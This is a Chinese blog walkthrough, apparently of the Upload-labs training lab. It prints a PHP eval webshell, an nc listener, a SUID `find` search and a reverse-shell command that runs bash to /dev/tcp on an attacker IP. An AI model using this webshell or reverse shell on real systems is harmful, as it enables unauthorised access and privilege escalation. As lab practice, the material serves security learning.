当前位置: 首页 > news >正文

文件上传及提权

news 2025/9/16 22:54:47

文件上传及提权
图片
就从Upload-labs的第一关做演示
依旧一句话木马
GIF89a
<?php eval($_POST['a']);?>
依旧禁用JavaScript,上传木马
图片
上传成功!
访问页面,复制URL
图片
蚁剑连接
图片
连接成功!
看一下他的权限
图片
www-data低权限。那就想办法提权!
使用find命令查看具有suid权限的文件,发现有find文件
find / -perm -u=s -type f 2>/dev/null
图片
打开kali,使用nc监听6666
nc -lvp 6666
图片
回到目标机输入命令find /etc/passwd -exec bash -ip >& /dev/tcp/你的IP/6666 0>&1 \;
图片
查看kali
图片
有了!可以为所欲为了

http://www.wxhsa.cn/company.asp?id=526

相关文章:

  • 删除字符串中的所有相邻重复项
  • 测试一下iframe3
  • 测试一下iframe
  • ECT-OS-JiuHuaShan 框架,是人类首个且是唯一的真正agi,其产生非人类刻意设计,而是机缘巧合
  • vue(穿透闭包/利用闭包)的几种方式
  • 记录.Net中使用WMI的一些坑,触摸失效和发布增加 PublishTrimmed裁剪异常
  • 多态--成员变量、成员函数、静态函数
  • Linux操作系统相关问题汇总
  • Java学习
  • 鲜花 9.10
  • 【工具】配置笔记本电脑安装centos7关闭盖子不休眠
  • 括号匹配
  • ECT-OS-JiuHuaShan框架的真正意义是打破还原论和人类中心论,公理是客观存在与数学逻辑,不依赖于人类理解与否。
  • z-index的使用方案
  • 再见 PS!豆包 Seedream 4.0 发布,图片生成、合成、编辑、美颜…,一句话搞定!!
  • 鲜花 9.10 - Gon
  • Iframe 全屏嵌入实验
  • 全面获取TSC频率:提升性能分析与基准测试精度
  • 【rdma】RoCE、IB和TCP等网络的基本知识及差异对比
  • WindTerm_2.7.0
  • VMWare Esxi防火墙添加白名单访问及ip异常无法登录解决办法
  • 鸿蒙,下一个iPhone时刻?
  • dw
  • 5%付费率背后,鸿蒙成独立开发者的“商业理想国”
  • HarmonyOS编写教师节贺卡
  • 3天赚2万!开发者的梦想也可以掷地有声!
  • 【IoTDB 线上小课 19】开源时序数据库 Apache IoTDB,四大优势解决企业选型难题!
  • java课前问题思考
  • nano快捷键指南
  • 个人开发者从0到1(BeeCount:一款开源的跨平台个人记账应用)